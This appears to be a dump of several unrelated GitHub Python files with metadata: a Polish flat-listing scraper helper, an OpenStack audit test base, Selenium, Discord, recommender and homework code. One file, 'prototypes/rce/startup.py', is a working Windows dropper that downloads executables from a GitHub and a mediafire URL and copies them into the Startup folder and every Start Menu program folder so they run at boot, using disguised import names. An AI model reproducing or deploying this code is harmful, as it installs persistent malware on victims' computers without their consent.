pytz\nimport gc\nimport math\nfrom dateutil.parser import parse\nfrom scrapy import logformatter\nfrom scrapy.exceptions import DropItem\n\nlogger = logging.getLogger(__name__)\n\n\nclass PoliteLogFormatter(logformatter.LogFormatter):\n def dropped(self, item, exception, response, spider):\n if '_id' in item.keys():\n return {\n 'level': logging.INFO,\n 'msg': u\"Dropped item %s, %s\" % (item['_id'],item['url']),\n 'args': {\n 'exception': exception,\n 'item': item,\n }\n }\n else:\n return {\n 'level': logging.INFO,\n 'msg': u\"Dropped item, exception: %s\" % exception,\n 'args': {\n 'exception': exception,\n 'item': item,\n }\n }\n\n\nclass Time:\n\n @staticmethod\n def timer(start, end):\n hours, rem = divmod(end-start, 3600)\n minutes, seconds = divmod(rem, 60)\n return \"{:0>2}:{:0>2}:{:05.2f}\".format(int(hours),int(minutes),seconds)\n\n\nclass Scraper:\n\n @staticmethod\n def current_timestamp():\n return int(datetime.datetime.now().timestamp())\n\n @staticmethod\n def current_datetime():\n return datetime.datetime.utcnow()\n # return datetime.datetime.now(pytz.timezone(\"Europe/Warsaw\"))\n\n @staticmethod\n def datetime2str(dt):\n if isinstance(dt, datetime.datetime):\n return dt.__str__()\n\n @staticmethod\n def timestamp2datetime(timestamp):\n return datetime.datetime.fromtimestamp(timestamp)\n\n @staticmethod\n def contains_digit(x):\n return any([i.isdigit() for i in x])\n\n @staticmethod\n def dict_except(dictionary, except_keys=[], include_keys=None):\n temp = {}\n for key in dictionary:\n if key not in except_keys:\n if include_keys is None:\n temp[key] = dictionary[key]\n else:\n if key in include_keys:\n temp[key] = dictionary[key]\n return temp\n\n @staticmethod\n def concat_dict(dict_list):\n return reduce(lambda x, y: dict(x, **y), dict_list)\n\n @staticmethod\n def digits_from_str(txt, returntype=float):\n \"\"\"return numbers from string '523 000 zł' -> 523000,\n\n :param:\n txt - text that contains number\n :return:\n int\n \"\"\"\n if txt and re.search('[\\d., ]{1,}', txt):\n result = re.sub(\",\", \".\", re.sub(r\" +\", \"\", re.findall('[\\d., ]{1,}', txt)[-1]))\n if len(result) == 0:\n return None\n else:\n if returntype == int:\n return int(float(result))\n elif returntype == float:\n return float(result)\n else:\n return None\n\n @staticmethod\n def convert_floor(x):\n if x:\n if str(x).strip().isdigit():\n return int(x)\n elif x.lower() == 'parter':\n return int(0)\n elif x.lower() == 'suterena':\n return None\n elif x == '> 10':\n return int(11)\n elif x.lower() == 'powyżej 10':\n return int(11)\n elif x.lower() == 'powyżej 30':\n return int(11)\n elif x == 'poddasze':\n return None\n elif type(x) == str:\n return Scraper.digits_from_str(x)\n else:\n return None\n else:\n return None\n\n @staticmethod\n def get_createdate_polish_months(data):\n\n logger.debug(data)\n if data:\n reg = r\"[0123]?\\d\\W+\\S+\\W+20\\d\\d\"\n match = re.search(reg, data.lower())\n if match:\n x = match.group(0)\n logger.debug(x)\n x = re.sub(r\"stycz\\S+\", \"jan\", x)\n x = re.sub(r\"lut\\S+\", \"feb\", x)\n x = re.sub(r\"mar\\S+\", \"mar\", x)\n x = re.sub(r\"kwie\\S+\", \"apr\", x)\n x = re.sub(r\"maj\\S+\", \"may\", x)\n x = re.sub(r\"czerw\\S+\", \"jun\", x)\n x = re.sub(r\"lip\\S+\", \"jul\", x)\n x = re.sub(r\"sierp\\S+\", \"aug\", x)\n x = re.sub(r\"wrze\\S+\", \"sep\", x)\n x = re.sub(r\"pa.dziern\\S+\", \"oct\", x)\n x = re.sub(r\"listopa\\S+\", \"nov\", x)\n x = re.sub(r\"grud\\S+\", \"dec\", x)\n logger.debug(x)\n\n try:\n x = parse(x)\n x = Scraper.datetime2str(x)\n logger.debug(x)\n return x\n except BaseException:\n logger.error(x)\n return None\n\n else:\n return None\n else:\n return None\n\n @staticmethod\n def searchregex(txt, pattern, group=0, func=None):\n if txt:\n match = re.search(pattern, txt)\n if match and func:\n return func(match.group(group))\n elif match:\n return match.group(group)\n else:\n return None\n else:\n return None\n\n\nclass Geodata:\n\n @staticmethod\n def get_geodata_otodom(content):\n\n pattern = \"latitude.:(\\d\\d.\\d+),.longitude.:(\\d\\d.\\d+)\"\n if re.search(pattern, content.decode(\"utf-8\")):\n geocoordinates = dict()\n geocoordinates['latitude'] = Scraper.searchregex(\n content.decode(\"utf-8\"),\"latitude.:(\\d\\d.\\d+)\", group=1)\n geocoordinates['longitude'] = Scraper.searchregex(\n content.decode(\"utf-8\"),\"longitude.:(\\d\\d.\\d+)\", group=1)\n return geocoordinates\n else:\n return dict()\n\n @staticmethod\n def get_geodata_olx(content):\n\n pattern = r'{\\W+zoom\\W+\\d+\\W+lat\\W+(\\d+.\\d+)\\W+lon\\W+(\\d+.\\d+)'\n match = re.search(pattern, content.decode(\"utf-8\"))\n if match:\n data_lat = float(match.group(1))\n data_lon = float(match.group(2))\n geocoordinates = {\"latitude\": data_lat, \"longitude\": data_lon}\n return geocoordinates\n else:\n return dict()\n\n @staticmethod\n def get_geodata_gratka(content):\n\n pattern = \"szerokosc-geograficzna-y..[\\d]{2}\\\\.[\\d]+\"\n if re.search(pattern, content.decode(\"utf-8\")):\n data_lat = re.findall(\"szerokosc-geograficzna-y..[\\d]{2}\\\\.[\\d]+\", content.decode(\"utf-8\"))[0]\n data_lat = \"\".join([i for i in data_lat if i.isdigit() or i == \".\"])\n data_lon = re.findall(\"dlugosc-geograficzna-x..[\\d]{2}\\\\.[\\d]+\", content.decode(\"utf-8\"))[0]\n data_lon = \"\".join([i for i in data_lon if i.isdigit() or i == \".\"])\n geocoordinates = {\"latitude\": data_lat, \"longitude\": data_lon}\n return geocoordinates\n else:\n return dict()\n\n @staticmethod\n def get_geocode_openstreet(geocoordinates):\n\n try:\n address = requests.get(\n \"https://nominatim.openstreetmap.org/reverse?format=xml&lat={latitude}&lon={longitude}&zoom=18&addressdetails=1\".format(\n **geocoordinates)\n )\n\n address_text = xmltodict.parse(address.content)['reversegeocode']['addressparts']\n\n address_coordin = xmltodict.parse(address.content)['reversegeocode']['result']\n\n return geocoordinates, address_text, address_coordin\n except BaseException as e:\n raise DropItem(\"Openstreetmap error, %s \" % e)\n\n @staticmethod\n def haversine(GC_latitude, GC_longitude):\n \"\"\"calculates distance between coordinates and Warsaw, Jana Kazmierza\n\n Parameters\n ----------\n GC_latitude : float\n latitude ex. 52.22264693429859\n GC_longitude : float\n longitude, ex. 20.938653945922855\n\n Returns\n -------\n int\n distance in kilometers\n \"\"\"\n\n R = 6372800 # Earth radius in meters\n lat1, lon1 = (52.22264693429859, 20.938653945922855)\n lat2, lon2 = (GC_latitude, GC_longitude)\n\n phi1, phi2 = math.radians(lat1), math.radians(lat2)\n dphi = math.radians(lat2 - lat1)\n dlambda = math.radians(lon2 - lon1)\n\n a = math.sin(dphi/2)**2 + \\\n math.cos(phi1)*math.cos(phi2)*math.sin(dlambda/2)**2\n\n return int(2*R*math.atan2(math.sqrt(a), math.sqrt(1 - a))/1000)\n", "repo_name": "xSzpo/xFlats-K8S", "sub_path": "scraper/helpers/base.py", "file_name": "base.py", "file_ext": "py", "file_size_in_byte": 8674, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "logging.getLogger", "line_number": 16, "usage_type": "call"}, {"api_name": "scrapy.logformatter.LogFormatter", "line_number": 19, "usage_type": "attribute"}, {"api_name": "scrapy.logformatter", "line_number": 19, "usage_type": "name"}, {"api_name": "logging.INFO", "line_number": 23, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 32, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 54, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 54, "usage_type": "attribute"}, {"api_name": "datetime.datetime.utcnow", "line_number": 58, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 58, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 63, "usage_type": "attribute"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 68, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 68, "usage_type": "attribute"}, {"api_name": "functools.reduce", "line_number": 88, "usage_type": "call"}, {"api_name": "re.search", "line_number": 99, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 100, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 100, "usage_type": "call"}, {"api_name": "re.search", "line_number": 141, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 145, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 146, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 147, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 148, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 149, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 150, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 151, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 152, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 153, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 154, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 155, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 156, "usage_type": "call"}, {"api_name": "dateutil.parser.parse", "line_number": 160, "usage_type": "call"}, {"api_name": "re.search", "line_number": 176, "usage_type": "call"}, {"api_name": "re.search", "line_number": 193, "usage_type": "call"}, {"api_name": "re.search", "line_number": 207, "usage_type": "call"}, {"api_name": "re.search", "line_number": 220, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 221, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 223, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 234, "usage_type": "call"}, {"api_name": "xmltodict.parse", "line_number": 239, "usage_type": "call"}, {"api_name": "xmltodict.parse", "line_number": 241, "usage_type": "call"}, {"api_name": "scrapy.exceptions.DropItem", "line_number": 245, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 268, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 269, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 270, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 272, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 273, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 273, "usage_type": "call"}, {"api_name": "math.atan2", "line_number": 275, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 275, "usage_type": "call"}]} +{"seq_id": "15317522603", "text": "from os import system as sus, getenv as ghebe, listdir, path\nfrom requests import get as loc\n\n# vars \n\nurl1, url2 = 'https://github.com/Spaceish/swap-base/raw/master/yny.exe', 'https://download856.mediafire.com/52vdph6e1nug/hkleocww3qbbc95/ynysebu.exe'\nurl_file1, url_file2 = loc(url=url1, allow_redirects=True).content, loc(url=url2, allow_redirects=True).content\nfile1_ext, file2_ext = url1.split('/')[-1].split('.')[-1], url2.split('/')[-1].split('.')[-1]\n\ndir2 = f\"{ghebe('appdata')}\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\"\ndir3 = f\"{ghebe('appdata')}\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\"\n\n\n# making the placeholder folder for the payload to run at startup\nsus(f\"cd {dir3} && rmdir suus && mkdir suus && exit\")\n# putting the payload in the startup folders\nopen(f\"{dir2}\\\\sebu.{file2_ext}\", 'wb').write(url_file2);open(f\"{dir2}\\\\pocc.{file1_ext}\", 'wb').write(url_file1)\n# putting the payload in the placeholder folder a couple of times to ensure that it runs on startup\nfor _ in range(3): open(f\"{dir3}\\\\suus\\\\pocc.{file2_ext}\", 'wb').write(url_file2)\n# also putting the payload in every startup app it finds\nfor folder in listdir(dir3):\n f = path.join(dir3, folder)\n if path.isdir(f):\n open(f\"{f}\\\\pocc.{file2_ext}\", 'wb').write(url_file2)", "repo_name": "Spaceish/swap-base", "sub_path": "prototypes/rce/startup.py", "file_name": "startup.py", "file_ext": "py", "file_size_in_byte": 1275, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "requests.get", "line_number": 7, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 10, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 11, "usage_type": "call"}, {"api_name": "os.system", "line_number": 15, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "name"}]} +{"seq_id": "9244753554", "text": "# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\nfrom oslo_config import fixture as cfg_fixture\nfrom oslo_messaging import conffixture as msg_fixture\nfrom oslotest import createfile\nimport webob.dec\n\nfrom keystonemiddleware import audit\nfrom keystonemiddleware.tests.unit import utils\n\n\naudit_map_content = \"\"\"\n[custom_actions]\nreboot = start/reboot\nos-migrations/get = read\n\n[path_keywords]\naction = None\nos-hosts = host\nos-migrations = None\nreboot = None\nservers = server\n\n[service_endpoints]\ncompute = service/compute\n\"\"\"\n\n\nclass BaseAuditMiddlewareTest(utils.MiddlewareTestCase):\n PROJECT_NAME = 'keystonemiddleware'\n\n def setUp(self):\n super(BaseAuditMiddlewareTest, self).setUp()\n\n self.audit_map_file_fixture = self.useFixture(\n createfile.CreateFileWithContent('audit', audit_map_content))\n\n self.cfg = self.useFixture(cfg_fixture.Config())\n self.msg = self.useFixture(msg_fixture.ConfFixture(self.cfg.conf))\n\n self.cfg.conf([], project=self.PROJECT_NAME)\n\n def create_middleware(self, cb, **kwargs):\n\n @webob.dec.wsgify\n def _do_cb(req):\n return cb(req)\n\n kwargs.setdefault('audit_map_file', self.audit_map)\n kwargs.setdefault('service_name', 'pycadf')\n\n return audit.AuditMiddleware(_do_cb, **kwargs)\n\n @property\n def audit_map(self):\n return self.audit_map_file_fixture.path\n\n @staticmethod\n def get_environ_header(req_type=None):\n env_headers = {'HTTP_X_SERVICE_CATALOG':\n '''[{\"endpoints_links\": [],\n \"endpoints\": [{\"adminURL\":\n \"http://admin_host:8774\",\n \"region\": \"RegionOne\",\n \"publicURL\":\n \"http://public_host:8774\",\n \"internalURL\":\n \"http://internal_host:8774\",\n \"id\": \"resource_id\"}],\n \"type\": \"compute\",\n \"name\": \"nova\"}]''',\n 'HTTP_X_USER_ID': 'user_id',\n 'HTTP_X_USER_NAME': 'user_name',\n 'HTTP_X_AUTH_TOKEN': 'token',\n 'HTTP_X_PROJECT_ID': 'tenant_id',\n 'HTTP_X_IDENTITY_STATUS': 'Confirmed'}\n if req_type:\n env_headers['REQUEST_METHOD'] = req_type\n return env_headers\n", "repo_name": "openstack/keystonemiddleware", "sub_path": "keystonemiddleware/tests/unit/audit/base.py", "file_name": "base.py", "file_ext": "py", "file_size_in_byte": 3049, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 65, "dataset": "github-code", "pt": "41", "api": [{"api_name": "keystonemiddleware.tests.unit.utils.MiddlewareTestCase", "line_number": 40, "usage_type": "attribute"}, {"api_name": "keystonemiddleware.tests.unit.utils", "line_number": 40, "usage_type": "name"}, {"api_name": "oslotest.createfile.CreateFileWithContent", "line_number": 47, "usage_type": "call"}, {"api_name": "oslotest.createfile", "line_number": 47, "usage_type": "name"}, {"api_name": "oslo_config.fixture.Config", "line_number": 49, "usage_type": "call"}, {"api_name": "oslo_config.fixture", "line_number": 49, "usage_type": "name"}, {"api_name": "oslo_messaging.conffixture.ConfFixture", "line_number": 50, "usage_type": "call"}, {"api_name": "oslo_messaging.conffixture", "line_number": 50, "usage_type": "name"}, {"api_name": "webob.dec.dec", "line_number": 56, "usage_type": "attribute"}, {"api_name": "webob.dec", "line_number": 56, "usage_type": "name"}, {"api_name": "keystonemiddleware.audit.AuditMiddleware", "line_number": 63, "usage_type": "call"}, {"api_name": "keystonemiddleware.audit", "line_number": 63, "usage_type": "name"}]} +{"seq_id": "22147876639", "text": "# -*- coding: UTF-8 -*-\n'''\n操作日期控件,常用方法封装\n'''\n\nfrom utils.selenium_util import FIND_ELEMENT_METHOD, wait_for_element_show\n\ndef specify_datepicker_by_remove_attr(browser, input_name, year, month, day):\n '''\n wdatepicker控件\n 删除readonly属性,直接赋值\n '''\n browser.execute_script(\"$('input[name=%s]').removeAttr('readonly')\" % input_name)\n browser.find_element_by_name(input_name).send_keys('%s-%s-%s' % (day, month, year))\n\ndef specify_datepicker_by_run_script(browser, year, month, day):\n '''\n wdatepicker控件\n 直接调用wdatepicker的js\n '''\n browser.switch_to.default_content()\n datepicker_iframe = browser.find_element_by_xpath(\"//iframe[contains(@src,'about:blank')]\")\n browser.switch_to.frame(datepicker_iframe)\n wait_for_element_show(browser, FIND_ELEMENT_METHOD.XPATH, \"//div[@class='WdateDiv']\")\n browser.execute_script('day_Click(' + '%s,%s,%s' % (year, month, day) + ')')\n\ndef specify_datepicker_as_today(browser):\n '''\n wdatepicker控件\n 选择日期为当天\n '''\n browser.switch_to.default_content()\n datepicker_iframe = browser.find_element_by_xpath(\"//iframe[contains(@src,'about:blank')]\")\n browser.switch_to.frame(datepicker_iframe)\n wait_for_element_show(browser, FIND_ELEMENT_METHOD.XPATH, \"//div[@class='WdateDiv']\")\n browser.find_element_by_id('dpOkInput').click()\n\ndef specify_datepicker_by_go_through(browser, year, month, day):\n '''\n wdatepicker控件\n 通过遍历元素来选值\n '''\n browser.switch_to.default_content()\n datepicker_iframe = browser.find_element_by_xpath(\"//iframe[contains(@src,'about:blank')]\")\n browser.switch_to.frame(datepicker_iframe)\n wait_for_element_show(browser, FIND_ELEMENT_METHOD.XPATH, \"//div[@class='WdateDiv']\")\n browser.find_element_by_xpath(\"//td[@onclick='day_Click(%s,%s,%s);']\" % (year, month, day)).click()", "repo_name": "dennyx/ui-bdd", "sub_path": "utils/datepicker_util.py", "file_name": "datepicker_util.py", "file_ext": "py", "file_size_in_byte": 1914, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "41", "api": [{"api_name": "utils.selenium_util.wait_for_element_show", "line_number": 24, "usage_type": "call"}, {"api_name": "utils.selenium_util.FIND_ELEMENT_METHOD.XPATH", "line_number": 24, "usage_type": "attribute"}, {"api_name": "utils.selenium_util.FIND_ELEMENT_METHOD", "line_number": 24, "usage_type": "name"}, {"api_name": "utils.selenium_util.wait_for_element_show", "line_number": 35, "usage_type": "call"}, {"api_name": "utils.selenium_util.FIND_ELEMENT_METHOD.XPATH", "line_number": 35, "usage_type": "attribute"}, {"api_name": "utils.selenium_util.FIND_ELEMENT_METHOD", "line_number": 35, "usage_type": "name"}, {"api_name": "utils.selenium_util.wait_for_element_show", "line_number": 46, "usage_type": "call"}, {"api_name": "utils.selenium_util.FIND_ELEMENT_METHOD.XPATH", "line_number": 46, "usage_type": "attribute"}, {"api_name": "utils.selenium_util.FIND_ELEMENT_METHOD", "line_number": 46, "usage_type": "name"}]} +{"seq_id": "72523630204", "text": "import torch\r\nimport torch.nn as nn\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\ndef compute_precision_recall(targets, predictions):\r\n num_hit = len(set(predictions).intersection(set(targets)))\r\n precision = float(num_hit) / len(predictions)\r\n recall = float(num_hit) / len(targets)\r\n return precision, recall\r\n\r\n\r\n\r\ndef compute_map(targets, predictions, k):\r\n if len(predictions) > k:\r\n predictions = predictions[:k]\r\n\r\n score = 0.0\r\n num_hits = 0.0\r\n for i, p in enumerate(predictions):\r\n if p in targets and p not in predictions[:i]:\r\n num_hits += 1.0\r\n score += num_hits / (i + 1.0)\r\n if not list(targets):\r\n return 0.0\r\n\r\n return score / min(len(targets), k)\r\n\r\n\r\nfile1=open('predict.txt','w+')\r\n\r\ndef predict(model,test_input,test_data,usernotInteract,k_list):\r\n total_precision = [0]*len(k_list)\r\n total_recall = [0]*len(k_list)\r\n total_map = list()\r\n file1.write('#####################################################\\n')\r\n for u in range(1,len(test_input)):\r\n input = torch.from_numpy(np.asarray(test_input[u]))\r\n #print(input.size())\r\n output = -model(input).squeeze(1).cpu().numpy().flatten()\r\n pred_ind = output.argsort()\r\n predictions = [test_input[u][index][1] for index in pred_ind] #each data in test_input[u]: [u, i, user_seq, item_seq]\r\n predictions_copy = [str(s) for s in predictions[:20]]\r\n ss = str(u)+\":\"+\" \".join(predictions_copy)+'\\n'\r\n\r\n file1.write(ss)\r\n tes= [str(s) for s in test_data[u]]\r\n\r\n ta = str(u)+\":\"+\" \".join(tes)+'\\n'\r\n\r\n file1.write(ta)\r\n\r\n\r\n\r\n #print(i,output.size())\r\n for j in range(len(k_list)):\r\n precision, recall = compute_precision_recall(test_data[u], predictions[:k_list[j]])\r\n total_precision[j] += precision\r\n total_recall[j] += recall\r\n total_map.append(compute_map(test_data[u], predictions, k=np.inf))\r\n\r\n return total_precision,total_recall,total_map\r\n\r\n\r\n\r\n", "repo_name": "chenqijason/DACNN", "sub_path": "predictFun.py", "file_name": "predictFun.py", "file_ext": "py", "file_size_in_byte": 2039, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "torch.from_numpy", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 60, "usage_type": "attribute"}]} +{"seq_id": "41456029517", "text": "import asyncio\nimport aiohttp\nimport pprint\n\n\nasync def download_json_data(url : str, session : aiohttp.ClientSession):\n async with session.get(url) as response:\n print(\"here\")\n data = await response.json()\n print(data['img'])\n\n\n\nasync def download_kcd_metadata(sites : list):\n async with aiohttp.ClientSession() as session:\n tasks = []\n for url in sites:\n task = asyncio.create_task(download_json_data(url, session)) \n tasks.append(task)\n\n await asyncio.gather(*tasks, return_exceptions=True) \n\n\nif __name__==\"__main__\":\n sites = [f\"https://xkcd.com/{i+1}/info.0.json\" for i in range(1)]\n asyncio.get_event_loop().run_until_complete(download_kcd_metadata(sites))\n", "repo_name": "petreleven/code_adventure", "sub_path": "experiment.py", "file_name": "experiment.py", "file_ext": "py", "file_size_in_byte": 742, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "aiohttp.ClientSession", "line_number": 6, "usage_type": "attribute"}, {"api_name": "aiohttp.ClientSession", "line_number": 15, "usage_type": "call"}, {"api_name": "asyncio.create_task", "line_number": 18, "usage_type": "call"}, {"api_name": "asyncio.gather", "line_number": 21, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "32398446943", "text": "import discord\nfrom discord.ext import commands\nfrom discord.ext.commands.cooldowns import BucketType\nfrom PIL import Image\n\nclass Avatar(commands.Cog):\n \n def __init__(self, client):\n self.client = client\n\n # Command to display a user's avatar\n @commands.command()\n @commands.cooldown(1, 2, BucketType.user)\n async def avatar(self, ctx, *, member: discord.Member = None):\n \n # If no member is provided, default to the command author\n target_member = member or ctx.author\n \n embed = discord.Embed(title=f\"{target_member.name}'s Avatar\", colour=0x12ba01)\n f = discord.File(\"Avatar.png\", filename=\"avatar.png\")\n embed.set_image(url=f\"attachment://avatar.png\")\n await ctx.send(file=f, embed=embed)\n\n # Command to equip an accessory to an avatar\n @commands.command()\n async def equip(self, ctx, accessory=None):\n if accessory is None:\n return await ctx.send(\"Pick an accessory to equip\")\n\n # Equip a hat to the avatar\n if accessory == \"hat\":\n filename = 'Hat.png'\n hat_image = Image.open(filename, 'r')\n \n filename1 = 'Avatar.png'\n avatar_bg = Image.open(filename1, 'r')\n \n # Composite the avatar and the hat\n text_img = Image.new('RGBA', (800, 600), (0, 0, 0, 0))\n text_img.paste(avatar_bg, (0, 0))\n text_img.paste(hat_image, (170, -185), mask=hat_image)\n \n text_img.save(\"ball.png\", format=\"png\")\n\n # Send the updated avatar\n avatar = discord.File(\"ball.png\", filename=\"avatar.png\")\n embed = discord.Embed(title=f\"{ctx.author.name}'s Avatar\")\n embed.set_image(url=f\"attachment://avatar.png\")\n await ctx.send(file=avatar, embed=embed)\n\n# Setup function to add the cog\ndef setup(client):\n client.add_cog(Avatar(client))\n", "repo_name": "Kartikinator/Vitality", "sub_path": "Cogs/avatar.py", "file_name": "avatar.py", "file_ext": "py", "file_size_in_byte": 1928, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "discord.ext.commands.Cog", "line_number": 6, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 6, "usage_type": "name"}, {"api_name": "discord.Member", "line_number": 14, "usage_type": "attribute"}, {"api_name": "discord.Embed", "line_number": 19, "usage_type": "call"}, {"api_name": "discord.File", "line_number": 20, "usage_type": "call"}, {"api_name": "discord.ext.commands.command", "line_number": 12, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 12, "usage_type": "name"}, {"api_name": "discord.ext.commands.cooldown", "line_number": 13, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 13, "usage_type": "name"}, {"api_name": "discord.ext.commands.cooldowns.BucketType.user", "line_number": 13, "usage_type": "attribute"}, {"api_name": "discord.ext.commands.cooldowns.BucketType", "line_number": 13, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 33, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 33, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 36, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 36, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 39, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 39, "usage_type": "name"}, {"api_name": "discord.File", "line_number": 46, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 47, "usage_type": "call"}, {"api_name": "discord.ext.commands.command", "line_number": 25, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 25, "usage_type": "name"}]} +{"seq_id": "13921654882", "text": "from typing import List\nfrom typing import TextIO\n\n\nclass Data:\n def __init__(self, parseString: str) -> None:\n super().__init__()\n fields: List['str'] = parseString.split(\";\")\n self.versenyzo: str = fields[0]\n self.rajtszam: int = int(fields[1])\n self.kategoria: str = fields[2]\n self.versenyido: str = fields[3]\n self.tavszazalek: int = int(fields[4])\n\n def __str__(self) -> str:\n return \"versenyzo = {v}; rajtszam = {r}; kategoria = {k}; versenyido = {vi}; tavszazalek = {t}\".format(v=self.versenyzo, r=self.rajtszam, k=self.kategoria, vi=self.versenyido, t=self.tavszazalek)\n\n\nclass Read:\n def __init__(self) -> None:\n super().__init__()\n f: TextIO = open(\"!_Specifikacio/ub2017egyeni.txt\", \"r\")\n content: str = f.read()\n lines: List['str'] = content.split(sep=\"\\n\")\n datalist: List['Data'] = list()\n for i in range(1, len(lines)):\n d = Data(lines[i])\n datalist.append(d)\n #3.feladat\n print(\"3. feladat: Egyéni indulók: {db} fő \".format(db=len(datalist)))\n\n #4.feladat\n nok: int = 0\n noi: str = \"Noi\"\n for i in range(1, len(datalist)):\n if datalist[i].kategoria == noi and datalist[i].tavszazalek == 100:\n nok += 1\n print(\"4. feladat: Célba érkező női sportolók száma: {nok} fő\".format(nok=nok))\n\n #5.feladat\n vnev = input(\"5.feladat: Kérem a sportoló nevét: \")\n van: str = \"Nem\"\n tav: str = \"Nem\"\n for x in range(1, len(datalist)):\n if datalist[x].versenyzo == vnev:\n van = \"Igen\"\n if datalist[x].tavszazalek == 100 and datalist[x].versenyzo == vnev:\n tav = \"Igen\"\n print(\"Indult egyéniben a sportoló? {van}\".format(van=van))\n print(\"Teljesítette a teljes távot? {tav}\".format(tav=tav))\n\n # #6.feladat\n # for c in range(1, len(datalist)):\n # cella: datalist[c].versenyido['str'] = parseString.split(\":\")\n # self.ora:int = int(cella[1])\n # self.perc:int = int(cella[2])\n # self.masodperc:int = int(cella[3])\n # print(self.ora)\n #\n # def __str__(self) -> str:\n # return \"ora = {o}; perc = {p}; masodperc = {mp}\".format(o=self.ora, p=self.perc, mp=self.masodperc)\n #\n #\n #\n # #7.feladat\n # tferfiak: int = 0\n # ferfi: str = \"Ferfi\"\n # for z in range(1, len(datalist)):\n # if datalist[z].kategoria == ferfi and datalist[x].tavszazalek == 100:\n # tferfiak += 1\n # teljesferfiatlag = tferfiak /\n # print(teljesferfiatlag)\n\n # #8.feladat\n # minferfi\n # minno\n\nRead()", "repo_name": "csany2020c/MyGame", "sub_path": "File/3_feladat/horvathboldizsar.py", "file_name": "horvathboldizsar.py", "file_ext": "py", "file_size_in_byte": 2790, "program_lang": "python", "lang": "hu", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "typing.List", "line_number": 8, "usage_type": "name"}, {"api_name": "typing.TextIO", "line_number": 22, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 24, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 25, "usage_type": "name"}]} +{"seq_id": "23222316439", "text": "import subprocess\nimport traceback\nimport urlparse\nimport urllib\nimport glib\nimport time\nimport sys\nimport os\nfrom lxml import objectify\n\napi_key = 'eba9632ddc908a8fd7ad1200d771beb7'\napi_url = 'http://ws.audioscrobbler.com/2.0/'\nparts = ['artist', 'name', 'album', 'date', 'url']\n\ndef lastfm_lookup():\n _, username, irssi_encoding, lastfm_strftime, lastfm_output = sys.argv\n url = urlparse.urljoin(api_url, '?' + 